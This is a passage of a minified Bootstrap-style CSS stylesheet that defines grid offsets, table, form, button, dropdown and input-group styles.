  339. .col-lg-pull-8{right:66.66666667%}
  340. .col-lg-pull-7{right:58.33333333%}
  341. .col-lg-pull-6{right:50%}
  342. .col-lg-pull-5{right:41.66666667%}
  343. .col-lg-pull-4{right:33.33333333%}
  344. .col-lg-pull-3{right:25%}
  345. .col-lg-pull-2{right:16.66666667%}
  346. .col-lg-pull-1{right:8.33333333%}
  347. .col-lg-pull-0{right:auto}
  348. .col-lg-push-12{left:100%}
  349. .col-lg-push-11{left:91.66666667%}
  350. .col-lg-push-10{left:83.33333333%}
  351. .col-lg-push-9{left:75%}
  352. .col-lg-push-8{left:66.66666667%}
  353. .col-lg-push-7{left:58.33333333%}
  354. .col-lg-push-6{left:50%}
  355. .col-lg-push-5{left:41.66666667%}
  356. .col-lg-push-4{left:33.33333333%}
  357. .col-lg-push-3{left:25%}
  358. .col-lg-push-2{left:16.66666667%}
  359. .col-lg-push-1{left:8.33333333%}
  360. .col-lg-push-0{left:auto}
  361. .col-lg-offset-12{margin-left:100%}
  362. .col-lg-offset-11{margin-left:91.66666667%}
  363. .col-lg-offset-10{margin-left:83.33333333%}
  364. .col-lg-offset-9{margin-left:75%}
  365. .col-lg-offset-8{margin-left:66.66666667%}
  366. .col-lg-offset-7{margin-left:58.33333333%}
  367. .col-lg-offset-6{margin-left:50%}
  368. .col-lg-offset-5{margin-left:41.66666667%}
  369. .col-lg-offset-4{margin-left:33.33333333%}
  370. .col-lg-offset-3{margin-left:25%}
  371. .col-lg-offset-2{margin-left:16.66666667%}
  372. .col-lg-offset-1{margin-left:8.33333333%}
  373. .col-lg-offset-0{margin-left:0}}
  374. table{background-color:transparent}
  375. th{text-align:left}
  376. .table{width:100%;max-width:100%;margin-bottom:20px}
  377. .table>tbody>tr>td,.table>tbody>tr>th,.table>tfoot>tr>td,.table>tfoot>tr>th,.table>thead>tr>td,.table>thead>tr>th{padding:8px;line-height:1.42857143;vertical-align:top;border-top:1px solid #ddd}
  378. .table>thead>tr>th{vertical-align:bottom;border-bottom:2px solid #ddd}
  379. .table>caption+thead>tr:first-child>td,.table>caption+thead>tr:first-child>th,.table>colgroup+thead>tr:first-child>td,.table>colgroup+thead>tr:first-child>th,.table>thead:first-child>tr:first-child>td,.table>thead:first-child>tr:first-child>th{border-top:0}
  380. .table>tbody+tbody{border-top:2px solid #ddd}
  381. .table .table{background-color:#fff}
  382. .table-condensed>tbody>tr>td,.table-condensed>tbody>tr>th,.table-condensed>tfoot>tr>td,.table-condensed>tfoot>tr>th,.table-condensed>thead>tr>td,.table-condensed>thead>tr>th{padding:5px}
  383. .table-bordered,.table-bordered>tbody>tr>td,.table-bordered>tbody>tr>th,.table-bordered>tfoot>tr>td,.table-bordered>tfoot>tr>th,.table-bordered>thead>tr>td,.table-bordered>thead>tr>th{border:1px solid #ddd}
  384. .table-bordered>thead>tr>td,.table-bordered>thead>tr>th{border-bottom-width:2px}
  385. .table-striped>tbody>tr:nth-child(odd)>td,.table-striped>tbody>tr:nth-child(odd)>th{background-color:#f9f9f9}
  386. .table-hover>tbody>tr:hover>td,.table-hover>tbody>tr:hover>th{background-color:#f5f5f5}
  387. table col[class*=col-]{position:static;float:none;display:table-column}
  388. table td[class*=col-],table th[class*=col-]{position:static;float:none;display:table-cell}
  389. .table>tbody>tr.active>td,.table>tbody>tr.active>th,.table>tbody>tr>td.active,.table>tbody>tr>th.active,.table>tfoot>tr.active>td,.table>tfoot>tr.active>th,.table>tfoot>tr>td.active,.table>tfoot>tr>th.active,.table>thead>tr.active>td,.table>thead>tr.active>th,.table>thead>tr>td.active,.table>thead>tr>th.active{background-color:#f5f5f5}
  390. .table-hover>tbody>tr.active:hover>td,.table-hover>tbody>tr.active:hover>th,.table-hover>tbody>tr:hover>.active,.table-hover>tbody>tr>td.active:hover,.table-hover>tbody>tr>th.active:hover{background-color:#e8e8e8}
  391. .table>tbody>tr.success>td,.table>tbody>tr.success>th,.table>tbody>tr>td.success,.table>tbody>tr>th.success,.table>tfoot>tr.success>td,.table>tfoot>tr.success>th,.table>tfoot>tr>td.success,.table>tfoot>tr>th.success,.table>thead>tr.success>td,.table>thead>tr.success>th,.table>thead>tr>td.success,.table>thead>tr>th.success{background-color:#dff0d8}
  392. .table-hover>tbody>tr.success:hover>td,.table-hover>tbody>tr.success:hover>th,.table-hover>tbody>tr:hover>.success,.table-hover>tbody>tr>td.success:hover,.table-hover>tbody>tr>th.success:hover{background-color:#d0e9c6}
  393. .table>tbody>tr.info>td,.table>tbody>tr.info>th,.table>tbody>tr>td.info,.table>tbody>tr>th.info,.table>tfoot>tr.info>td,.table>tfoot>tr.info>th,.table>tfoot>tr>td.info,.table>tfoot>tr>th.info,.table>thead>tr.info>td,.table>thead>tr.info>th,.table>thead>tr>td.info,.table>thead>tr>th.info{background-color:#d9edf7}
  394. .table-hover>tbody>tr.info:hover>td,.table-hover>tbody>tr.info:hover>th,.table-hover>tbody>tr:hover>.info,.table-hover>tbody>tr>td.info:hover,.table-hover>tbody>tr>th.info:hover{background-color:#c4e3f3}
  395. .table>tbody>tr.warning>td,.table>tbody>tr.warning>th,.table>tbody>tr>td.warning,.table>tbody>tr>th.warning,.table>tfoot>tr.warning>td,.table>tfoot>tr.warning>th,.table>tfoot>tr>td.warning,.table>tfoot>tr>th.warning,.table>thead>tr.warning>td,.table>thead>tr.warning>th,.table>thead>tr>td.warning,.table>thead>tr>th.warning{background-color:#fcf8e3}
  396. .table-hover>tbody>tr.warning:hover>td,.table-hover>tbody>tr.warning:hover>th,.table-hover>tbody>tr:hover>.warning,.table-hover>tbody>tr>td.warning:hover,.table-hover>tbody>tr>th.warning:hover{background-color:#faf2cc}
  397. .table>tbody>tr.danger>td,.table>tbody>tr.danger>th,.table>tbody>tr>td.danger,.table>tbody>tr>th.danger,.table>tfoot>tr.danger>td,.table>tfoot>tr.danger>th,.table>tfoot>tr>td.danger,.table>tfoot>tr>th.danger,.table>thead>tr.danger>td,.table>thead>tr.danger>th,.table>thead>tr>td.danger,.table>thead>tr>th.danger{background-color:#f2dede}
  398. .table-hover>tbody>tr.danger:hover>td,.table-hover>tbody>tr.danger:hover>th,.table-hover>tbody>tr:hover>.danger,.table-hover>tbody>tr>td.danger:hover,.table-hover>tbody>tr>th.danger:hover{background-color:#ebcccc}
  399. @media screen and (max-width:767px){.table-responsive{width:100%;margin-bottom:15px;overflow-y:hidden;overflow-x:auto;-ms-overflow-style:-ms-autohiding-scrollbar;border:1px solid #ddd;-webkit-overflow-scrolling:touch}
  400. .table-responsive>.table{margin-bottom:0}
  401. .table-responsive>.table>tbody>tr>td,.table-responsive>.table>tbody>tr>th,.table-responsive>.table>tfoot>tr>td,.table-responsive>.table>tfoot>tr>th,.table-responsive>.table>thead>tr>td,.table-responsive>.table>thead>tr>th{white-space:nowrap}
  402. .table-responsive>.table-bordered{border:0}
  403. .table-responsive>.table-bordered>tbody>tr>td:first-child,.table-responsive>.table-bordered>tbody>tr>th:first-child,.table-responsive>.table-bordered>tfoot>tr>td:first-child,.table-responsive>.table-bordered>tfoot>tr>th:first-child,.table-responsive>.table-bordered>thead>tr>td:first-child,.table-responsive>.table-bordered>thead>tr>th:first-child{border-left:0}
  404. .table-responsive>.table-bordered>tbody>tr>td:last-child,.table-responsive>.table-bordered>tbody>tr>th:last-child,.table-responsive>.table-bordered>tfoot>tr>td:last-child,.table-responsive>.table-bordered>tfoot>tr>th:last-child,.table-responsive>.table-bordered>thead>tr>td:last-child,.table-responsive>.table-bordered>thead>tr>th:last-child{border-right:0}
  405. .table-responsive>.table-bordered>tbody>tr:last-child>td,.table-responsive>.table-bordered>tbody>tr:last-child>th,.table-responsive>.table-bordered>tfoot>tr:last-child>td,.table-responsive>.table-bordered>tfoot>tr:last-child>th{border-bottom:0}}
  406. fieldset{padding:0;margin:0;border:0;min-width:0}
  407. legend{display:block;width:100%;padding:0;margin-bottom:20px;font-size:21px;line-height:inherit;color:#333;border:0;border-bottom:1px solid #e5e5e5}
  408. label{display:inline-block;max-width:100%;margin-bottom:5px;font-weight:700}
  409. input[type=search]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}
  410. input[type=checkbox],input[type=radio]{margin:4px 0 0;line-height:normal}
  411. input[type=file]{display:block}
  412. input[type=range]{display:block;width:100%}
  413. select[multiple],select[size]{height:auto}
  414. input[type=file]:focus,input[type=checkbox]:focus,input[type=radio]:focus{outline:dotted thin;outline:-webkit-focus-ring-color auto 5px;outline-offset:-2px}
  415. output{display:block;padding-top:7px;font-size:14px;line-height:1.42857143;color:#000}
  416. .form-control{display:block;width:100%;height:34px;padding:6px 12px;font-size:14px;line-height:1.42857143;color:#000;background-color:#fff;background-image:none;-o-transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s}
  417. .form-control::-moz-placeholder{color:#9aa2ab;opacity:1}
  418. .form-control:-ms-input-placeholder{color:#9aa2ab}
  419. .form-control::-webkit-input-placeholder{color:#9aa2ab}
  420. .form-control[disabled],.form-control[readonly],fieldset[disabled] .form-control{cursor:not-allowed;background-color:#eee;opacity:1}
  421. textarea.form-control{height:auto}
  422. input[type=search]{-webkit-appearance:none}
  423. input[type=date],input[type=time],input[type=datetime-local],input[type=month]{line-height:34px;line-height:1.42857143 \0}
  424. input[type=date].input-sm,input[type=time].input-sm,input[type=datetime-local].input-sm,input[type=month].input-sm{line-height:30px}
  425. input[type=date].input-lg,input[type=time].input-lg,input[type=datetime-local].input-lg,input[type=month].input-lg{line-height:46px}
  426. .form-group{margin-bottom:15px}
  427. .checkbox,.radio{position:relative;display:block;min-height:20px;margin-top:10px;margin-bottom:10px}
  428. .checkbox label,.radio label{padding-left:20px;margin-bottom:0;font-weight:400;cursor:pointer}
  429. .checkbox input[type=checkbox],.checkbox-inline input[type=checkbox],.radio input[type=radio],.radio-inline input[type=radio]{position:absolute;margin-left:-20px}
  430. .checkbox+.checkbox,.radio+.radio{margin-top:-5px}
  431. .checkbox-inline,.radio-inline{display:inline-block;padding-left:20px;margin-bottom:0;vertical-align:middle;font-weight:400;cursor:pointer}
  432. .checkbox-inline+.checkbox-inline,.radio-inline+.radio-inline{margin-top:0;margin-left:10px}
  433. .checkbox-inline.disabled,.checkbox.disabled label,.radio-inline.disabled,.radio.disabled label,fieldset[disabled] .checkbox label,fieldset[disabled] .checkbox-inline,fieldset[disabled] .radio label,fieldset[disabled] .radio-inline,fieldset[disabled] input[type=checkbox],fieldset[disabled] input[type=radio],input[type=checkbox].disabled,input[type=checkbox][disabled],input[type=radio].disabled,input[type=radio][disabled]{cursor:not-allowed}
  434. .form-control-static{padding-top:7px;padding-bottom:7px;margin-bottom:0}
  435. .form-control-static.input-lg,.form-control-static.input-sm{padding-left:0;padding-right:0}
  436. .form-horizontal .form-group-sm .form-control,.input-sm{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}
  437. select.input-sm{height:30px;line-height:30px}
  438. select[multiple].input-sm,textarea.input-sm{height:auto}
  439. .form-horizontal .form-group-lg .form-control,.input-lg{height:46px;padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}
  440. select.input-lg{height:46px;line-height:46px}
  441. select[multiple].input-lg,textarea.input-lg{height:auto}
  442. .has-feedback{position:relative}
  443. .has-feedback .form-control{padding-right:42.5px}
  444. .form-control-feedback{position:absolute;top:25px;right:0;z-index:2;display:block;width:34px;height:34px;line-height:34px;text-align:center}
  445. .input-lg+.form-control-feedback{width:46px;height:46px;line-height:46px}
  446. .input-sm+.form-control-feedback{width:30px;height:30px;line-height:30px}
  447. .has-success .checkbox,.has-success .checkbox-inline,.has-success .control-label,.has-success .help-block,.has-success .radio,.has-success .radio-inline{color:#3c763d}
  448. .has-success .form-control{border-color:#3c763d;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 1px rgba(0,0,0,.075)}
  449. .has-success .form-control:focus{border-color:#2b542c;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #67b168;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #67b168}
  450. .has-success .input-group-addon{color:#3c763d;border-color:#3c763d;background-color:#dff0d8}
  451. .has-success .form-control-feedback{color:#3c763d}
  452. .has-warning .checkbox,.has-warning .checkbox-inline,.has-warning .control-label,.has-warning .help-block,.has-warning .radio,.has-warning .radio-inline{color:#8a6d3b}
  453. .has-warning .form-control{border-color:#8a6d3b;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 1px rgba(0,0,0,.075)}
  454. .has-warning .form-control:focus{border-color:#66512c;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #c0a16b;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #c0a16b}
  455. .has-warning .input-group-addon{color:#8a6d3b;border-color:#8a6d3b;background-color:#fcf8e3}
  456. .has-warning .form-control-feedback{color:#8a6d3b}
  457. .has-error .checkbox,.has-error .checkbox-inline,.has-error .control-label,.has-error .help-block,.has-error .radio,.has-error .radio-inline{color:#a94442}
  458. .has-error .form-control{border-color:#a94442;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 1px rgba(0,0,0,.075)}
  459. .has-error .form-control:focus{border-color:#843534;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #ce8483;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #ce8483}
  460. .has-error .input-group-addon{color:#a94442;border-color:#a94442;background-color:#f2dede}
  461. .has-error .form-control-feedback{color:#a94442}
  462. .has-feedback label.sr-only~.form-control-feedback{top:0}
  463. .help-block{display:block;margin-top:5px;margin-bottom:10px;color:#404040}
  464. @media (min-width:768px){.form-inline .form-group{display:inline-block;margin-bottom:0;vertical-align:middle}
  465. .form-inline .form-control{display:inline-block;width:auto;vertical-align:middle}
  466. .form-inline .input-group{display:inline-table;vertical-align:middle}
  467. .form-inline .input-group .form-control,.form-inline .input-group .input-group-addon,.form-inline .input-group .input-group-btn{width:auto}
  468. .form-inline .input-group>.form-control{width:100%}
  469. .form-inline .control-label{margin-bottom:0;vertical-align:middle}
  470. .form-inline .checkbox,.form-inline .radio{display:inline-block;margin-top:0;margin-bottom:0;vertical-align:middle}
  471. .form-inline .checkbox label,.form-inline .radio label{padding-left:0}
  472. .form-inline .checkbox input[type=checkbox],.form-inline .radio input[type=radio]{position:relative;margin-left:0}
  473. .form-inline .has-feedback .form-control-feedback{top:0}}
  474. .form-horizontal .checkbox,.form-horizontal .checkbox-inline,.form-horizontal .radio,.form-horizontal .radio-inline{margin-top:0;margin-bottom:0;padding-top:7px}
  475. .form-horizontal .checkbox,.form-horizontal .radio{min-height:27px}
  476. .form-horizontal .form-group{margin-left:0;margin-right:0}
  477. @media (min-width:768px){.form-horizontal .control-label{text-align:right;margin-bottom:0;padding-top:7px}}
  478. .form-horizontal .has-feedback .form-control-feedback{top:0;right:0}
  479. @media (min-width:768px){.form-horizontal .form-group-lg .control-label{padding-top:14.3px}}
  480. @media (min-width:768px){.form-horizontal .form-group-sm .control-label{padding-top:6px}}
  481. .btn{display:inline-block;margin-bottom:0;font-weight:400;text-align:center;vertical-align:middle;cursor:pointer;background-image:none;white-space:nowrap;font-size:14px;line-height:1.42857143;border-radius:4px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}
  482. .btn.active:focus,.btn:active:focus,.btn:focus{outline-offset:-2px}
  483. .btn:focus,.btn:hover{color:#333;text-decoration:none}
  484. .btn.active,.btn:active{background-image:none}
  485. .btn.disabled,.btn[disabled],fieldset[disabled] .btn{cursor:not-allowed;pointer-events:none;opacity:.65;filter:alpha(opacity=65);-webkit-box-shadow:none;box-shadow:none}
  486. .btn-default{color:#333;background-color:#fff;border-color:#ccc}
  487. .btn-default.active,.btn-default:active,.btn-default:focus,.btn-default:hover,.open>.dropdown-toggle.btn-default{color:#333;background-color:#e6e6e6;border-color:#adadad}
  488. .btn-default.active,.btn-default:active,.open>.dropdown-toggle.btn-default{background-image:none}
  489. .btn-default.disabled,.btn-default.disabled.active,.btn-default.disabled:active,.btn-default.disabled:focus,.btn-default.disabled:hover,.btn-default[disabled],.btn-default[disabled].active,.btn-default[disabled]:active,.btn-default[disabled]:focus,.btn-default[disabled]:hover,fieldset[disabled] .btn-default,fieldset[disabled] .btn-default.active,fieldset[disabled] .btn-default:active,fieldset[disabled] .btn-default:focus,fieldset[disabled] .btn-default:hover{background-color:#fff;border-color:#ccc}
  490. .btn-default .badge{color:#fff;background-color:#333}
  491. .btn-primary{border-color:#5d8db3}
  492. .btn-primary.active,.btn-primary:active,.btn-primary:focus,.btn-primary:hover,.open>.dropdown-toggle.btn-primary{color:#fff;background-color:#477396;border-color:#436e8f}
  493. .btn-primary.active,.btn-primary:active,.open>.dropdown-toggle.btn-primary{background-image:none}
  494. .btn-primary.disabled,.btn-primary.disabled.active,.btn-primary.disabled:active,.btn-primary.disabled:focus,.btn-primary.disabled:hover,.btn-primary[disabled],.btn-primary[disabled].active,.btn-primary[disabled]:active,.btn-primary[disabled]:focus,.btn-primary[disabled]:hover,fieldset[disabled] .btn-primary,fieldset[disabled] .btn-primary.active,fieldset[disabled] .btn-primary:active,fieldset[disabled] .btn-primary:focus,fieldset[disabled] .btn-primary:hover{background-color:#5d8db3;border-color:#5d8db3}
  495. .btn-primary .badge{color:#5d8db3;background-color:#fff}
  496. .btn-success{border-color:#6ac065}
  497. .btn-success.active,.btn-success:active,.btn-success:focus,.btn-success:hover,.open>.dropdown-toggle.btn-success{color:#fff;background-color:#4cac46;border-color:#49a543}
  498. .btn-success.active,.btn-success:active,.open>.dropdown-toggle.btn-success{background-image:none}
  499. .btn-success.disabled,.btn-success.disabled.active,.btn-success.disabled:active,.btn-success.disabled:focus,.btn-success.disabled:hover,.btn-success[disabled],.btn-success[disabled].active,.btn-success[disabled]:active,.btn-success[disabled]:focus,.btn-success[disabled]:hover,fieldset[disabled] .btn-success,fieldset[disabled] .btn-success.active,fieldset[disabled] .btn-success:active,fieldset[disabled] .btn-success:focus,fieldset[disabled] .btn-success:hover{background-color:#6ac065;border-color:#6ac065}
  500. .btn-success .badge{color:#6ac065;background-color:#fff}
  501. .btn-info{color:#fff;background-color:#5bc0de;border-color:#5bc0de}
  502. .btn-info.active,.btn-info:active,.btn-info:focus,.btn-info:hover,.open>.dropdown-toggle.btn-info{color:#fff;background-color:#31b0d5;border-color:#2aabd2}
  503. .btn-info.active,.btn-info:active,.open>.dropdown-toggle.btn-info{background-image:none}
  504. .btn-info.disabled,.btn-info.disabled.active,.btn-info.disabled:active,.btn-info.disabled:focus,.btn-info.disabled:hover,.btn-info[disabled],.btn-info[disabled].active,.btn-info[disabled]:active,.btn-info[disabled]:focus,.btn-info[disabled]:hover,fieldset[disabled] .btn-info,fieldset[disabled] .btn-info.active,fieldset[disabled] .btn-info:active,fieldset[disabled] .btn-info:focus,fieldset[disabled] .btn-info:hover{background-color:#5bc0de;border-color:#5bc0de}
  505. .btn-info .badge{color:#5bc0de;background-color:#fff}
  506. .btn-warning{color:#fff;background-color:#f0ad4e;border-color:#f0ad4e}
  507. .btn-warning.active,.btn-warning:active,.btn-warning:focus,.btn-warning:hover,.open>.dropdown-toggle.btn-warning{color:#fff;background-color:#ec971f;border-color:#eb9316}
  508. .btn-warning.active,.btn-warning:active,.open>.dropdown-toggle.btn-warning{background-image:none}
  509. .btn-warning.disabled,.btn-warning.disabled.active,.btn-warning.disabled:active,.btn-warning.disabled:focus,.btn-warning.disabled:hover,.btn-warning[disabled],.btn-warning[disabled].active,.btn-warning[disabled]:active,.btn-warning[disabled]:focus,.btn-warning[disabled]:hover,fieldset[disabled] .btn-warning,fieldset[disabled] .btn-warning.active,fieldset[disabled] .btn-warning:active,fieldset[disabled] .btn-warning:focus,fieldset[disabled] .btn-warning:hover{background-color:#f0ad4e;border-color:#f0ad4e}
  510. .btn-warning .badge{color:#f0ad4e;background-color:#fff}
  511. .btn-danger{border-color:#c05f5a}
  512. .btn-danger.active,.btn-danger:active,.btn-danger:focus,.btn-danger:hover,.open>.dropdown-toggle.btn-danger{color:#fff;background-color:#a74540;border-color:#a0423d}
  513. .btn-danger.active,.btn-danger:active,.open>.dropdown-toggle.btn-danger{background-image:none}
  514. .btn-danger.disabled,.btn-danger.disabled.active,.btn-danger.disabled:active,.btn-danger.disabled:focus,.btn-danger.disabled:hover,.btn-danger[disabled],.btn-danger[disabled].active,.btn-danger[disabled]:active,.btn-danger[disabled]:focus,.btn-danger[disabled]:hover,fieldset[disabled] .btn-danger,fieldset[disabled] .btn-danger.active,fieldset[disabled] .btn-danger:active,fieldset[disabled] .btn-danger:focus,fieldset[disabled] .btn-danger:hover{background-color:#c05f5a;border-color:#c05f5a}
  515. .btn-danger .badge{color:#c05f5a;background-color:#fff}
  516. .btn-link{font-weight:400;cursor:pointer}
  517. .btn-link,.btn-link:active,.btn-link[disabled],fieldset[disabled] .btn-link{background-color:transparent;-webkit-box-shadow:none;box-shadow:none}
  518. .btn-link,.btn-link:active,.btn-link:focus,.btn-link:hover{border-color:transparent}
  519. .btn-link:focus,.btn-link:hover{color:#3a6d99;text-decoration:underline;background-color:transparent}
  520. .btn-link[disabled]:focus,.btn-link[disabled]:hover,fieldset[disabled] .btn-link:focus,fieldset[disabled] .btn-link:hover{color:#999;text-decoration:none}
  521. .btn-group-lg>.btn,.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}
  522. .btn-group-sm>.btn,.btn-sm{padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}
  523. .btn-group-xs>.btn,.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;border-radius:3px}
  524. .btn-block{display:block;width:100%}
  525. .btn-block+.btn-block{margin-top:5px}
  526. input[type=button].btn-block,input[type=reset].btn-block,input[type=submit].btn-block{width:100%}
  527. .fade{opacity:0;-webkit-transition:opacity .15s linear;-o-transition:opacity .15s linear;transition:opacity .15s linear}
  528. .fade.in{opacity:1}
  529. .collapse{display:none}
  530. .collapse.in{display:block}
  531. tr.collapse.in{display:table-row}
  532. tbody.collapse.in{display:table-row-group}
  533. .collapsing{position:relative;height:0;overflow:hidden;-webkit-transition:height .35s ease;-o-transition:height .35s ease;transition:height .35s ease}
  534. .caret{display:inline-block;width:0;height:0;margin-left:2px;vertical-align:middle;border-top:4px solid;border-right:4px solid transparent;border-left:4px solid transparent}
  535. .dropdown{position:relative}
  536. .dropdown-toggle:focus{outline:0}
  537. .dropdown-menu{position:absolute;top:100%;left:0;z-index:1000;display:none;float:left;min-width:160px;margin:2px 0 0;list-style:none;font-size:14px;text-align:left;background-color:#fff;border:1px solid #ccc;border:1px solid rgba(0,0,0,.15);background-clip:padding-box}
  538. .dropdown-menu.pull-right{right:0;left:auto}
  539. .dropdown-menu .divider{height:1px;margin:9px 0;overflow:hidden;background-color:#e5e5e5}
  540. .dropdown-menu>li>a{display:block;clear:both;font-weight:400;line-height:1.42857143;color:#333;white-space:nowrap}
  541. .dropdown-menu>li>a:focus,.dropdown-menu>li>a:hover{text-decoration:none;color:#262626;background-color:#f5f5f5}
  542. .dropdown-menu>.active>a,.dropdown-menu>.active>a:focus,.dropdown-menu>.active>a:hover{color:#fff;text-decoration:none;outline:0;background-color:#5d8db3}
  543. .dropdown-menu>.disabled>a,.dropdown-menu>.disabled>a:focus,.dropdown-menu>.disabled>a:hover{color:#999}
  544. .dropdown-menu>.disabled>a:focus,.dropdown-menu>.disabled>a:hover{text-decoration:none;background-color:transparent;background-image:none;filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);cursor:not-allowed}
  545. .open>.dropdown-menu{display:block}
  546. .open>a{outline:0}
  547. .dropdown-menu-right{left:auto;right:0}
  548. .dropdown-menu-left{left:0;right:auto}
  549. .dropdown-header{display:block;padding:3px 20px;font-size:12px;line-height:1.42857143;color:#999;white-space:nowrap}
  550. .dropdown-backdrop{position:fixed;left:0;right:0;bottom:0;top:0;z-index:990}
  551. .pull-right>.dropdown-menu{right:0;left:auto}
  552. .dropup .caret,.navbar-fixed-bottom .dropdown .caret{border-top:0;border-bottom:4px solid;content:""}
  553. .dropup .dropdown-menu,.navbar-fixed-bottom .dropdown .dropdown-menu{top:auto;bottom:100%;margin-bottom:1px}
  554. @media (min-width:480px){.navbar-right .dropdown-menu{left:auto;right:0}
  555. .navbar-right .dropdown-menu-left{left:0;right:auto}}
  556. .btn-group,.btn-group-vertical{position:relative;display:inline-block;vertical-align:middle}
  557. .btn-group-vertical>.btn,.btn-group>.btn{position:relative;float:left}
  558. .btn-group-vertical>.btn.active,.btn-group-vertical>.btn:active,.btn-group-vertical>.btn:focus,.btn-group-vertical>.btn:hover,.btn-group>.btn.active,.btn-group>.btn:active,.btn-group>.btn:focus,.btn-group>.btn:hover{z-index:2}
  559. .btn-group-vertical>.btn:focus,.btn-group>.btn:focus{outline:0}
  560. .btn-group .btn+.btn,.btn-group .btn+.btn-group,.btn-group .btn-group+.btn,.btn-group .btn-group+.btn-group{margin-left:-1px}
  561. .btn-toolbar{margin-left:-5px}
  562. .btn-toolbar .btn-group,.btn-toolbar .input-group{float:left}
  563. .btn-toolbar>.btn,.btn-toolbar>.btn-group,.btn-toolbar>.input-group{margin-left:5px}
  564. .btn-group>.btn:not(:first-child):not(:last-child):not(.dropdown-toggle){border-radius:0}
  565. .btn-group>.btn:first-child{margin-left:0}
  566. .btn-group>.btn:first-child:not(:last-child):not(.dropdown-toggle){border-bottom-right-radius:0;border-top-right-radius:0}
  567. .btn-group>.btn:last-child:not(:first-child),.btn-group>.dropdown-toggle:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0}
  568. .btn-group>.btn-group{float:left}
  569. .btn-group>.btn-group:not(:first-child):not(:last-child)>.btn{border-radius:0}
  570. .btn-group>.btn-group:first-child>.btn:last-child,.btn-group>.btn-group:first-child>.dropdown-toggle{border-bottom-right-radius:0;border-top-right-radius:0}
  571. .btn-group>.btn-group:last-child>.btn:first-child{border-bottom-left-radius:0;border-top-left-radius:0}
  572. .btn-group .dropdown-toggle:active,.btn-group.open .dropdown-toggle{outline:0}
  573. .btn-group>.btn+.dropdown-toggle{padding-left:8px;padding-right:8px}
  574. .btn-group>.btn-lg+.dropdown-toggle{padding-left:12px;padding-right:12px}
  575. .btn-group.open .dropdown-toggle{-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}
  576. .btn-group.open .dropdown-toggle.btn-link{-webkit-box-shadow:none;box-shadow:none}
  577. .btn .caret{margin-left:0}
  578. .btn-lg .caret{border-width:5px 5px 0}
  579. .dropup .btn-lg .caret{border-width:0 5px 5px}
  580. .btn-group-vertical>.btn,.btn-group-vertical>.btn-group,.btn-group-vertical>.btn-group>.btn{display:block;float:none;width:100%;max-width:100%}
  581. .btn-group-vertical>.btn-group>.btn{float:none}
  582. .btn-group-vertical>.btn+.btn,.btn-group-vertical>.btn+.btn-group,.btn-group-vertical>.btn-group+.btn,.btn-group-vertical>.btn-group+.btn-group{margin-top:-1px;margin-left:0}
  583. .btn-group-vertical>.btn:not(:first-child):not(:last-child){border-radius:0}
  584. .btn-group-vertical>.btn:first-child:not(:last-child){border-top-right-radius:4px;border-bottom-right-radius:0;border-bottom-left-radius:0}
  585. .btn-group-vertical>.btn:last-child:not(:first-child){border-bottom-left-radius:4px;border-top-right-radius:0;border-top-left-radius:0}
  586. .btn-group-vertical>.btn-group:not(:first-child):not(:last-child)>.btn{border-radius:0}
  587. .btn-group-vertical>.btn-group:first-child:not(:last-child)>.btn:last-child,.btn-group-vertical>.btn-group:first-child:not(:last-child)>.dropdown-toggle{border-bottom-right-radius:0;border-bottom-left-radius:0}
  588. .btn-group-vertical>.btn-group:last-child:not(:first-child)>.btn:first-child{border-top-right-radius:0;border-top-left-radius:0}
  589. .btn-group-justified{display:table;width:100%;table-layout:fixed;border-collapse:separate}
  590. .btn-group-justified>.btn,.btn-group-justified>.btn-group{float:none;display:table-cell;width:1%}
  591. .btn-group-justified>.btn-group .btn{width:100%}
  592. .btn-group-justified>.btn-group .dropdown-menu{left:auto}
  593. [data-toggle=buttons]>.btn>input[type=checkbox],[data-toggle=buttons]>.btn>input[type=radio]{position:absolute;z-index:-1;opacity:0;filter:alpha(opacity=0)}
  594. .input-group{position:relative;display:table;border-collapse:separate}
  595. .input-group[class*=col-]{float:none;padding-left:0;padding-right:0}
  596. .input-group .form-control{position:relative;z-index:2;float:left;width:100%;margin-bottom:0}
  597. .input-group-lg>.form-control,.input-group-lg>.input-group-addon,.input-group-lg>.input-group-btn>.btn{height:46px;padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}
  598. select.input-group-lg>.form-control,select.input-group-lg>.input-group-addon,select.input-group-lg>.input-group-btn>.btn{height:46px;line-height:46px}
  599. select[multiple].input-group-lg>.form-control,select[multiple].input-group-lg>.input-group-addon,select[multiple].input-group-lg>.input-group-btn>.btn,textarea.input-group-lg>.form-control,textarea.input-group-lg>.input-group-addon,textarea.input-group-lg>.input-group-btn>.btn{height:auto}
  600. .input-group-sm>.form-control,.input-group-sm>.input-group-addon,.input-group-sm>.input-group-btn>.btn{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}
  601. select.input-group-sm>.form-control,select.input-group-sm>.input-group-addon,select.input-group-sm>.input-group-btn>.btn{height:30px;line-height:30px}
  602. select[multiple].input-group-sm>.form-control,select[multiple].input-group-sm>.input-group-addon,select[multiple].input-group-sm>.input-group-btn>.btn,textarea.input-group-sm>.form-control,textarea.input-group-sm>.input-group-addon,textarea.input-group-sm>.input-group-btn>.btn{height:auto}
